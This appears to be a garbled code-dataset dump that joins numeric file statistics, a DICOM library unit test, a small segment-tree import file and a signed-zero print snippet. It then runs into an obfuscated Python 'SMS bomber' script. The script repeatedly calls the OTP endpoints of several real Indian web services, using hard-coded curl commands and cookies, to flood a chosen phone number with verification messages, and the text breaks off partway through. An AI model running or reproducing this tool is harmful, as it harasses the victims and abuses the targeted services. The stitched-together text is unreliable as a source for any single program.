F_shift[0,0,0] = 0 # 0 mean
signal = np.fft.ifftn(F_shift)
return signal.real
| 32.379182
| 109
| 0.556889
| 2,469
| 17,420
| 3.72175
| 0.130822
| 0.0074
| 0.013494
| 0.0111
| 0.891065
| 0.865927
| 0.857438
| 0.816629
| 0.810426
| 0.786593
| 0
| 0.039467
| 0.271297
| 17,420
| 538
| 110
| 32.379182
| 0.684182
| 0.64271
| 0
| 0.564286
| 1
| 0
| 0.068156
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042857
| false
| 0
| 0.007143
| 0
| 0.092857
| 0.064286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba18cd8ff212404246eb251ede3803dc3458611d
| 5,221
|
py
|
Python
|
mudicom/tests/test_read.py
|
neurosnap/mudicom
|
04011967007409f0c5253b4f308f53a7b0fc99c6
|
[
"MIT"
] | 32
|
2015-01-09T10:51:06.000Z
|
2021-04-03T09:50:52.000Z
|
mudicom/tests/test_read.py
|
neurosnap/mudicom
|
04011967007409f0c5253b4f308f53a7b0fc99c6
|
[
"MIT"
] | 3
|
2015-05-07T19:15:26.000Z
|
2021-04-16T15:13:23.000Z
|
mudicom/tests/test_read.py
|
neurosnap/mudicom
|
04011967007409f0c5253b4f308f53a7b0fc99c6
|
[
"MIT"
] | 18
|
2015-04-11T14:24:42.000Z
|
2020-12-27T21:26:06.000Z
|
import os.path
import unittest
import gdcm
import mudicom
class TestRead(unittest.TestCase):
def setUp(self):
nose_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "dicoms")
self.fnames = (os.path.join(nose_dir, "ex1.dcm"),
os.path.join(nose_dir, "ex2.dcm"),)
def test_get_dataset(self):
for fname in self.fnames:
mu = mudicom.load(fname)
ds = mu.read()
self.assertIsInstance(ds, list)
self.assertIsNot(len(ds), 0)
for element in ds:
self.assertTrue(hasattr(element, "name"))
self.assertTrue(hasattr(element, "value"))
self.assertTrue(hasattr(element, "VR"))
self.assertTrue(hasattr(element, "VL"))
self.assertTrue(hasattr(element, "tag"))
self.assertTrue("group" in element.tag)
self.assertTrue("element" in element.tag)
self.assertTrue("str" in element.tag)
def test_map_VR(self):
self.assertEqual(mudicom.lookup.VR(VR="AE"), "Application Entity")
self.assertEqual(mudicom.lookup.VR("OB"), "Other Byte")
self.assertEqual(mudicom.lookup.VR("US"), "Unsigned Short")
self.assertEqual(mudicom.lookup.VR(description="Time"), "TM")
self.assertEqual(mudicom.lookup.VR(description="Unknown"), "UN")
self.assertEqual(mudicom.lookup.VR(description="Sequence of Items"), "SQ")
self.assertEqual(None, mudicom.lookup.VR("ZZ"))
self.assertEqual(None, mudicom.lookup.VR("Hi there"))
def test_map_VR_deprecated(self):
self.assertEqual(mudicom.lookup_VR(VR="AE"), "Application Entity")
self.assertEqual(mudicom.lookup_VR("OB"), "Other Byte")
self.assertEqual(mudicom.lookup_VR("US"), "Unsigned Short")
self.assertEqual(mudicom.lookup_VR(description="Time"), "TM")
self.assertEqual(mudicom.lookup_VR(description="Unknown"), "UN")
self.assertEqual(mudicom.lookup_VR(description="Sequence of Items"), "SQ")
self.assertEqual(None, mudicom.lookup_VR("ZZ"))
self.assertEqual(None, mudicom.lookup_VR("Hi there"))
def test_map_ts(self):
self.assertEqual(mudicom.lookup.transfer_syntax(UID="1.2.840.10008.1.2"), "Implicit VR Endian: Default Transfer Syntax for DICOM")
self.assertEqual(mudicom.lookup.transfer_syntax("1.2.840.10008.1.2.4.80"), "JPEG-LS Lossless Image Compression")
self.assertEqual(mudicom.lookup.transfer_syntax("1.2.840.10008.1.2.4.91"), "JPEG 2000 Image Compression")
self.assertEqual(mudicom.lookup.transfer_syntax(description="JPIP Referenced"), "1.2.840.10008.1.2.4.94")
self.assertEqual(mudicom.lookup.transfer_syntax(description="RFC 2557 MIME Encapsulation"), "1.2.840.10008.1.2.6.1")
self.assertEqual(mudicom.lookup.transfer_syntax(description="Deflated Explicit VR Big Endian"), "1.2.840.10008.1.2.1.99")
self.assertEqual(None, mudicom.lookup.transfer_syntax("0.0.0.0"))
self.assertEqual(None, mudicom.lookup.transfer_syntax("Hi there"))
def test_map_ts_deprecated(self):
self.assertEqual(mudicom.lookup_transfer_syntax(UID="1.2.840.10008.1.2"), "Implicit VR Endian: Default Transfer Syntax for DICOM")
self.assertEqual(mudicom.lookup_transfer_syntax("1.2.840.10008.1.2.4.80"), "JPEG-LS Lossless Image Compression")
self.assertEqual(mudicom.lookup_transfer_syntax("1.2.840.10008.1.2.4.91"), "JPEG 2000 Image Compression")
self.assertEqual(mudicom.lookup_transfer_syntax(description="JPIP Referenced"), "1.2.840.10008.1.2.4.94")
self.assertEqual(mudicom.lookup_transfer_syntax(description="RFC 2557 MIME Encapsulation"), "1.2.840.10008.1.2.6.1")
self.assertEqual(mudicom.lookup_transfer_syntax(description="Deflated Explicit VR Big Endian"), "1.2.840.10008.1.2.1.99")
self.assertEqual(None, mudicom.lookup_transfer_syntax("0.0.0.0"))
self.assertEqual(None, mudicom.lookup_transfer_syntax("Hi there"))
def test_walk_dataset(self):
for fname in self.fnames:
mu = mudicom.load(fname)
#reader = mu.read()
tags = list(mu.walk(lambda ds: ds.GetTag()))
self.assertIsInstance(tags, list)
self.assertIsNot(len(tags), 0)
for tag in tags:
self.assertIsInstance(tag, gdcm.Tag)
tags = list(mu.walk(lambda ds: None))
self.assertIsInstance(tags, list)
for tag in tags:
self.assertEqual(tag, None)
tags = list(mu.walk(lambda ds: False))
self.assertIsInstance(tags, list)
for tag in tags:
self.assertFalse(tag)
tags = list(mu.walk(lambda ds: True))
self.assertIsInstance(tags, list)
for tag in tags:
self.assertTrue(tag)
def test_get_element(self):
for fname in self.fnames:
mu = mudicom.load(fname)
#reader = mu.read()
self.assertIsInstance(mu.find(0x004, 0x1220), list)
self.assertIsInstance(mu.find(name="Modality"), list)
self.assertIsInstance(mu.find(VR="PN"), list)
| 49.72381
| 138
| 0.646428
| 676
| 5,221
| 4.911243
| 0.177515
| 0.149096
| 0.159036
| 0.20241
| 0.797892
| 0.749096
| 0.727711
| 0.712651
| 0.712651
| 0.672892
| 0
| 0.050963
| 0.214518
| 5,221
| 104
| 139
| 50.201923
| 0.758595
| 0.006895
| 0
| 0.162791
| 0
| 0
| 0.173838
| 0.042061
| 0
| 0
| 0.002122
| 0
| 0.627907
| 1
| 0.093023
| false
| 0
| 0.046512
| 0
| 0.151163
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cd3e50e0e7049e6b9460273f71f4af4c0f9dd70
| 271
|
py
|
Python
|
tests/segment_tree/context.py
|
niemmi/algolib
|
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/segment_tree/context.py
|
niemmi/algolib
|
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/segment_tree/context.py
|
niemmi/algolib
|
81a013af5ae1ca1e8cf8d3f2e2f1b4a9bce6ead8
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
from algolib.segment_tree import segment_tree
from algolib.segment_tree import segment_tree_flex
from algolib.segment_tree import lazy_segment_tree
from algolib.segment_tree import lazy_segment_tree_flex
| 30.111111
| 55
| 0.841328
| 43
| 271
| 5.023256
| 0.302326
| 0.407407
| 0.333333
| 0.407407
| 0.759259
| 0.759259
| 0.759259
| 0.398148
| 0
| 0
| 0
| 0.004032
| 0.084871
| 271
| 8
| 56
| 33.875
| 0.866935
| 0
| 0
| 0
| 0
| 0
| 0.01845
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.857143
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
2cddf15893e1e2ed8c8d8d621dbaa8c9a5a17cb0
| 167
|
py
|
Python
|
notebook/positive_negative_zero.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/positive_negative_zero.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/positive_negative_zero.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
print(0)
# 0
print(-0)
# 0
print(0 == -0)
# True
print(0 is -0)
# True
print(0.0)
# 0.0
print(-0.0)
# -0.0
print(0.0 == -0.0)
# True
print(0.0 is -0.0)
# False
| 6.958333
| 18
| 0.508982
| 38
| 167
| 2.236842
| 0.131579
| 0.329412
| 0.576471
| 0.376471
| 0.870588
| 0.564706
| 0.317647
| 0.317647
| 0.317647
| 0.317647
| 0
| 0.1875
| 0.233533
| 167
| 23
| 19
| 7.26087
| 0.476563
| 0.197605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
fa6c7fcc53a6b969fb14bc9d0521cba5f8d595cd
| 68,156
|
py
|
Python
|
bombers.py
|
GHOST-PSYCHO/SMS-Bombers
|
d8c5248d5881c27398aae4d6d561332828515b39
|
[
"Apache-2.0"
] | 1
|
2020-06-26T10:00:55.000Z
|
2020-06-26T10:00:55.000Z
|
bombers.py
|
GHOST-PSYCHO/SMS-Bombers
|
d8c5248d5881c27398aae4d6d561332828515b39
|
[
"Apache-2.0"
] | null | null | null |
bombers.py
|
GHOST-PSYCHO/SMS-Bombers
|
d8c5248d5881c27398aae4d6d561332828515b39
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from datetime import datetime #line:2:from datetime import datetime
from termcolor import cprint #line:3:from termcolor import cprint
import os #line:4:import os
import hashlib #line:5:import hashlib
import sys #line:6:import sys
import time #line:7:import time
import threading #line:8:import threading
import string #line:9:import string
import random #line:10:import random
import base64 #line:11:import base64
import urllib .request #line:12:import urllib.request
import urllib .parse #line:13:import urllib.parse
try :#line:15:try:
import requests #line:16:import requests
except ImportError :#line:17:except ImportError:
print ('[!] Error: some dependencies are not installed')#line:18:print('[!] Error: some dependencies are not installed')
print ('Type \'pip install -r requirements.txt\' to install all required packages')#line:19:print('Type \'pip install -r requirements.txt\' to install all required packages')
exit ()#line:20:exit()
country_codes ={'93':'AF','355':'AL','213':'DZ','376':'AD','244':'AO','672':'AQ','54':'AR','374':'AM','297':'AW','61':'AU','43':'AT','994':'AZ','973':'BH','880':'BD','375':'BY','32':'BE','501':'BZ','229':'BJ','975':'BT','591':'BO','387':'BA','267':'BW','55':'BR','246':'IO','673':'BN','359':'BG','226':'BF','257':'BI','855':'KH','237':'CM','238':'CV','236':'CF','235':'TD','56':'CL','86':'CN','57':'CO','269':'KM','682':'CK','506':'CR','385':'HR','53':'CU','599':'AN','357':'CY','420':'CZ','243':'CD','45':'DK','253':'DJ','670':'TL','593':'EC','20':'EG','503':'SV','240':'GQ','291':'ER','372':'EE','251':'ET','500':'FK','298':'FO','679':'FJ','358':'FI','33':'FR','689':'PF','241':'GA','220':'GM','995':'GE','49':'DE','233':'GH','350':'GI','30':'GR','299':'GL','502':'GT','224':'GN','245':'GW','592':'GY','509':'HT','504':'HN','852':'HK','36':'HU','354':'IS','91':'IN','62':'ID','98':'IR','964':'IQ','353':'IE','972':'IL','39':'IT','225':'CI','81':'JP','962':'JO','254':'KE','686':'KI','383':'XK','965':'KW','996':'KG','856':'LA','371':'LV','961':'LB','266':'LS','231':'LR','218':'LY','423':'LI','370':'LT','352':'LU','853':'MO','389':'MK','261':'MG','265':'MW','60':'MY','960':'MV','223':'ML','356':'MT','692':'MH','222':'MR','230':'MU','262':'RE','52':'MX','691':'FM','373':'MD','377':'MC','976':'MN','382':'ME','212':'EH','258':'MZ','95':'MM','264':'NA','674':'NR','977':'NP','31':'NL','687':'NC','64':'NZ','505':'NI','227':'NE','234':'NG','683':'NU','850':'KP','47':'SJ','968':'OM','92':'PK','680':'PW','970':'PS','507':'PA','675':'PG','595':'PY','51':'PE','63':'PH','48':'PL','351':'PT','974':'QA','242':'CG','40':'RO','7':'RU','250':'RW','590':'MF','290':'SH','508':'PM','685':'WS','378':'SM','239':'ST','966':'SA','221':'SN','381':'RS','248':'SC','232':'SL','65':'SG','421':'SK','386':'SI','677':'SB','252':'SO','27':'ZA','82':'KR','211':'SS','34':'ES','94':'LK','249':'SD','597':'SR','268':'SZ','46':'SE','41':'CH','963':'SY','886':'TW','992':'TJ','255':'TZ','66':'TH','228':'TG','690':'TK','676':'TO','216':'TN','90':'TR','993':'TM','688':'TV','256':'UG','380':'UA','971':'AE','44':'GB','1':'US','598':'UY','998':'UZ','678':'VU','379':'VA','58':'VE','84':'VN','681':'WF','967':'YE','260':'ZM','263':'ZW'}#line:229:}
def banner ():#line:232:def banner():
cprint ("""
██████╗░██████╗░ ██████╗░░█████╗░███╗░░░███╗██████╗░███████╗██████╗░░██████╗ ██████╗░██╗░░░██╗
██╔══██╗██╔══██╗ ██╔══██╗██╔══██╗████╗░████║██╔══██╗██╔════╝██╔══██╗██╔════╝ ██╔══██╗╚██╗░██╔╝
██████╦╝██║░░██║ ██████╦╝██║░░██║██╔████╔██║██████╦╝█████╗░░██████╔╝╚█████╗░ ██████╦╝░╚████╔╝░
██╔══██╗██║░░██║ ██╔══██╗██║░░██║██║╚██╔╝██║██╔══██╗██╔══╝░░██╔══██╗░╚═══██╗ ██╔══██╗░░╚██╔╝░░
██████╦╝██████╔╝ ██████╦╝╚█████╔╝██║░╚═╝░██║██████╦╝███████╗██║░░██║██████╔╝ ██████╦╝░░░██║░░░
╚═════╝░╚═════╝░ ╚═════╝░░╚════╝░╚═╝░░░░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝╚═════╝░ ╚═════╝░░░░╚═╝░░░
───────────────────────────────────────────────────────────────────────────────────────────────────────
─██████████████─██████─────────██████████████─██████──────────██████─██████████─██████──────────██████─
─██░░░░░░░░░░██─██░░██─────────██░░░░░░░░░░██─██░░██████████████░░██─██░░░░░░██─██░░██████████──██░░██─
─██░░██████░░██─██░░██─────────██░░██████░░██─██░░░░░░░░░░░░░░░░░░██─████░░████─██░░░░░░░░░░██──██░░██─
─██░░██──██░░██─██░░██─────────██░░██──██░░██─██░░██████░░██████░░██───██░░██───██░░██████░░██──██░░██─
─██░░██████░░██─██░░██─────────██░░██████░░██─██░░██──██░░██──██░░██───██░░██───██░░██──██░░██──██░░██─
─██░░░░░░░░░░██─██░░██─────────██░░░░░░░░░░██─██░░██──██░░██──██░░██───██░░██───██░░██──██░░██──██░░██─
─██░░██████░░██─██░░██─────────██░░██████░░██─██░░██──██████──██░░██───██░░██───██░░██──██░░██──██░░██─
─██░░██──██░░██─██░░██─────────██░░██──██░░██─██░░██──────────██░░██───██░░██───██░░██──██░░██████░░██─
─██░░██──██░░██─██░░██████████─██░░██──██░░██─██░░██──────────██░░██─████░░████─██░░██──██░░░░░░░░░░██─
─██░░██──██░░██─██░░░░░░░░░░██─██░░██──██░░██─██░░██──────────██░░██─██░░░░░░██─██░░██──██████████░░██─
─██████──██████─██████████████─██████──██████─██████──────────██████─██████████─██████──────────██████─
───────────────────────────────────────────────────────────────────────────────────────────────────────
""",'green')#line:252:""", 'green')
print ()#line:253:print()
count_inf =0 #line:257:count_inf = 0
def infinite (OOO0OO00OO0O0OO0O ,O0OO00O000O00000O ,O0OO0OO0OO00O000O ,OOO0O000000000OO0 ):#line:260:def infinite(pn, dl, ch, max):
global count_inf #line:261:global count_inf
while True :#line:262:while True:
while os .path .exists ('proc.xxx'):#line:263:while os.path.exists('proc.xxx'):
time .sleep (0.5 )#line:264:time.sleep(0.5)
os .system ('touch proc.xxx')#line:265:os.system('touch proc.xxx')
OOO00O00O000O00OO =random .choice (O0OO0OO0OO00O000O )#line:266:api = random.choice(ch)
try :#line:267:try:
O0OO00O00000O000O =getapi (OOO0OO00OO0O0OO0O ,OOO00O00O000O00OO ,91 )#line:268:ret = getapi(pn, api, 91)
except Exception :#line:269:except Exception:
O0OO00O00000O000O =False #line:270:ret = False
if not O0OO00O00000O000O :#line:271:if not ret:
while O0OO0OO0OO00O000O .count (OOO00O00O000O00OO )>0 :#line:272:while ch.count(api) > 0:
O0OO0OO0OO00O000O .remove (OOO00O00O000O00OO )#line:273:ch.remove(api)
continue #line:274:continue
os .system ('rm proc.xxx >/dev/null 2>&1')#line:275:os.system('rm proc.xxx >/dev/null 2>&1')
count_inf +=1 #line:276:count_inf += 1
time .sleep (float (O0OO00O000O00000O ))#line:278:time.sleep(float(dl))
if (count_inf >maxlim ):#line:279:if (count_inf > maxlim):
exit ()#line:280:exit()
def checkinternet ():#line:283:def checkinternet():
OOOO0O0O00OO000O0 =False #line:284:res = False
try :#line:285:try:
requests .get ('https://www.google.com',verify =True )#line:286:requests.get('https://www.google.com', verify=True)
OOOO0O0O00OO000O0 =False #line:287:res = False
except Exception :#line:288:except Exception:
OOOO0O0O00OO000O0 =True #line:289:res = True
if OOOO0O0O00OO000O0 :#line:290:if res:
print ("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")#line:291:print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print ('\t\tTBomb Will Stop Now...\n\n')#line:292:print('\t\tTBomb Will Stop Now...\n\n')
banner ()#line:293:banner()
exit ()#line:294:exit()
def getapi (O00OO00OO0OO0O0OO ,OOO0O0OOOOO0O00OO ,OO0000O0O00O0OOO0 ):#line:297:def getapi(pn, lim, cc):
global country_codes #line:298:global country_codes
OO0000O0O00O0OOO0 =str (OO0000O0O00O0OOO0 ).strip ()#line:299:cc = str(cc).strip()
O0000OO0OOOOO000O =country_codes [OO0000O0O00O0OOO0 ]#line:300:cnn = country_codes[cc]
OOO0O0OOOOO0O00OO =int (OOO0O0OOOOO0O00OO )#line:301:lim = int(lim)
OO0O00O0OO000O0OO =["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B"+str (OO0000O0O00O0OOO0 )+"&nod=4&phone="+O00OO00OO0OO0O0OO ,"https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo="+O00OO00OO0OO0O0OO ,"https://securedapi.confirmtkt.com/api/platform/register?mobileNumber="+O00OO00OO0OO0O0OO ]#line:303:str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try :#line:304:try:
if OOO0O0OOOOO0O00OO <len (OO0O00O0OO000O0OO ):#line:305:if lim < len(url):
urllib .request .urlopen (str (OO0O00O0OO000O0OO [OOO0O0OOOOO0O00OO ]))#line:306:urllib.request.urlopen(str(url[lim]))
return True #line:307:return True
except (urllib .error .HTTPError ,urllib .error .URLError ):#line:308:except (urllib.error.HTTPError, urllib.error.URLError):
return False #line:309:return False
if OOO0O0OOOOO0O00OO ==3 :#line:310:if lim == 3:
os .system ('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno='+O00OO00OO0OO0O0OO +'&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')#line:311:os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True #line:312:return True
elif OOO0O0OOOOO0O00OO ==4 :#line:313:elif lim == 4:
os .system ('curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"'+O00OO00OO0OO0O0OO +'","country_code":"'+OO0000O0O00O0OOO0 +'"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')#line:315:'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True #line:316:return True
elif OOO0O0OOOOO0O00OO ==5 :#line:317:elif lim == 5:
os .system ('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode='+OO0000O0O00O0OOO0 +'&mobileno='+O00OO00OO0OO0O0OO +'" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')#line:319:cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True #line:320:return True
elif OOO0O0OOOOO0O00OO ==6 :#line:321:elif lim == 6:
os .system ('curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+'+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')#line:323:'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True #line:324:return True
elif OOO0O0OOOOO0O00OO ==7 :#line:325:elif lim == 7:
